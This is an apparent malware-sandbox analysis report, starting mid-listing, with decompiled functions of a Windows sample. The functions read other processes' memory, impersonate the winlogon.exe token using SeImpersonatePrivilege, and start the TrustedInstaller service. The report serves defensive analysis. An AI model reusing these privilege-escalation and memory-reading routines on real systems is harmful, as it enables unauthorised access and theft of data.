                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1529661771-70141382
                                                                                                                • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                                                • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                                                • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2827331108-0
                                                                                                                • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                                                • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                                                • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}





























                                                                                                                0x00401ac9
                                                                                                                0x00401ad1
                                                                                                                0x00401ae1
                                                                                                                0x00401ae7
                                                                                                                0x00401ae9
                                                                                                                0x00401aec
                                                                                                                0x00401c1b
                                                                                                                0x00401af2
                                                                                                                0x00401af2
                                                                                                                0x00401af8
                                                                                                                0x00401b0c
                                                                                                                0x00401b12
                                                                                                                0x00401b1a
                                                                                                                0x00401bfd
                                                                                                                0x00401b20
                                                                                                                0x00401b26
                                                                                                                0x00401b2b
                                                                                                                0x00401b36
                                                                                                                0x00401b40
                                                                                                                0x00401b43
                                                                                                                0x00401b4a
                                                                                                                0x00401b54
                                                                                                                0x00401b55
                                                                                                                0x00401b56
                                                                                                                0x00401b57
                                                                                                                0x00401b58
                                                                                                                0x00401b63
                                                                                                                0x00401b68
                                                                                                                0x00401b69
                                                                                                                0x00401b77
                                                                                                                0x00401b7d
                                                                                                                0x00401b82
                                                                                                                0x00401b82
                                                                                                                0x00401b88
                                                                                                                0x00401b8b
                                                                                                                0x00401b8e
                                                                                                                0x00401b91
                                                                                                                0x00401b98
                                                                                                                0x00401b9b
                                                                                                                0x00401ba0
                                                                                                                0x00401ba5
                                                                                                                0x00401baa
                                                                                                                0x00401bac
                                                                                                                0x00401bac
                                                                                                                0x00401bb2
                                                                                                                0x00401bb2
                                                                                                                0x00401bbe
                                                                                                                0x00401bc4
                                                                                                                0x00401bc6
                                                                                                                0x00401bc8
                                                                                                                0x00401bc8
                                                                                                                0x00401bd7
                                                                                                                0x00401be6
                                                                                                                0x00401bee
                                                                                                                0x00401bf0
                                                                                                                0x00401bf0
                                                                                                                0x00401c02
                                                                                                                0x00401c0e
                                                                                                                0x00401c0e
                                                                                                                0x00401c23

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                • memset.MSVCRT ref: 00401B4A
                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                                                • String ID: %d %I64x
                                                                                                                • API String ID: 1126726007-2565891505
                                                                                                                • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                0x00401f04
                                                                                                                0x00401f20
                                                                                                                0x00401f27
                                                                                                                0x00401f38
                                                                                                                0x00401f3f
                                                                                                                0x00401f4e
                                                                                                                0x00401f54
                                                                                                                0x00401f5f
                                                                                                                0x00401f6e
                                                                                                                0x00401f72
                                                                                                                0x00401f77
                                                                                                                0x00401f78
                                                                                                                0x00401f91
                                                                                                                0x00401f7a
                                                                                                                0x00401f88
                                                                                                                0x00401f8e
                                                                                                                0x00401f8e
                                                                                                                0x00401fa6
                                                                                                                0x00401fa9
                                                                                                                0x00401fae
                                                                                                                0x00401fb0
                                                                                                                0x00401fb2
                                                                                                                0x00401fb9
                                                                                                                0x00401fc2
                                                                                                                0x00401fca
                                                                                                                0x00401fd2
                                                                                                                0x00401fd2
                                                                                                                0x00401fd7
                                                                                                                0x00401fd7
                                                                                                                0x00401fe3

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401F27
                                                                                                                • memset.MSVCRT ref: 00401F3F
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00401F5A
                                                                                                                • wcslen.MSVCRT ref: 00401F69
                                                                                                                • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                • API String ID: 3867304300-2177360481
                                                                                                                • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                0x00401319
                                                                                                                0x0040131b
                                                                                                                0x00401327
                                                                                                                0x0040132b
                                                                                                                0x0040133a
                                                                                                                0x0040134b
                                                                                                                0x0040134b
                                                                                                                0x0040134e
                                                                                                                0x0040134e
                                                                                                                0x00401353
                                                                                                                0x0040135b

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                • String ID: TrustedInstaller
                                                                                                                • API String ID: 862991418-565535830
                                                                                                                • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                0x0040955f
                                                                                                                0x00409566
                                                                                                                0x0040956e
                                                                                                                0x00409576
                                                                                                                0x00409586
                                                                                                                0x00409586
                                                                                                                0x0040956e
                                                                                                                0x00409592
                                                                                                                0x004095aa
                                                                                                                0x00409594
                                                                                                                0x004095a3
                                                                                                                0x004095a6
                                                                                                                0x004095a6

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                0x0040a348
                                                                                                                0x0040a34e
                                                                                                                0x0040a352
                                                                                                                0x0040a35f
                                                                                                                0x0040a363
                                                                                                                0x0040a369
                                                                                                                0x0040a371
                                                                                                                0x0040a374
                                                                                                                0x0040a37c
                                                                                                                0x0040a380
                                                                                                                0x0040a383
                                                                                                                0x0040a386
                                                                                                                0x0040a388
                                                                                                                0x0040a388
                                                                                                                0x0040a38c
                                                                                                                0x0040a38f
                                                                                                                0x0040a39f
                                                                                                                0x0040a3a1
                                                                                                                0x0040a3a5
                                                                                                                0x0040a3a5
                                                                                                                0x0040a3a9
                                                                                                                0x0040a3aa
                                                                                                                0x0040a3b3
                                                                                                                0x0040a3b3
                                                                                                                0x0040a37c
                                                                                                                0x0040a371
                                                                                                                0x0040a3b8
                                                                                                                0x0040a3be

                                                                                                                APIs
                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 3473537107-0
                                                                                                                • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                0x00404951
                                                                                                                0x00404952
                                                                                                                0x00404956
                                                                                                                0x004049a1
                                                                                                                0x00404958
                                                                                                                0x00404959
                                                                                                                0x0040495b
                                                                                                                0x0040495b
                                                                                                                0x0040495f
                                                                                                                0x00404961
                                                                                                                0x00404963
                                                                                                                0x0040496d
                                                                                                                0x00404975
                                                                                                                0x00404977
                                                                                                                0x0040497b
                                                                                                                0x00404985
                                                                                                                0x0040498a
                                                                                                                0x0040498e
                                                                                                                0x00404993
                                                                                                                0x0040499d
                                                                                                                0x0040499d

                                                                                                                APIs
                                                                                                                • malloc.MSVCRT ref: 0040496D
                                                                                                                • memcpy.MSVCRT ref: 00404985
                                                                                                                • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: freemallocmemcpy
                                                                                                                • String ID: W@
                                                                                                                • API String ID: 3056473165-1729568415
                                                                                                                • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                0x0040543f
                                                                                                                0x00405456
                                                                                                                0x00405462
                                                                                                                0x00405467
                                                                                                                0x0040546d
                                                                                                                0x00405478
                                                                                                                0x00405489
                                                                                                                0x0040548d
                                                                                                                0x00000000
                                                                                                                0x00405492
                                                                                                                0x00405496

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                  • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                  • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                • wcscat.MSVCRT ref: 00405478
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3725422290-0
                                                                                                                • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
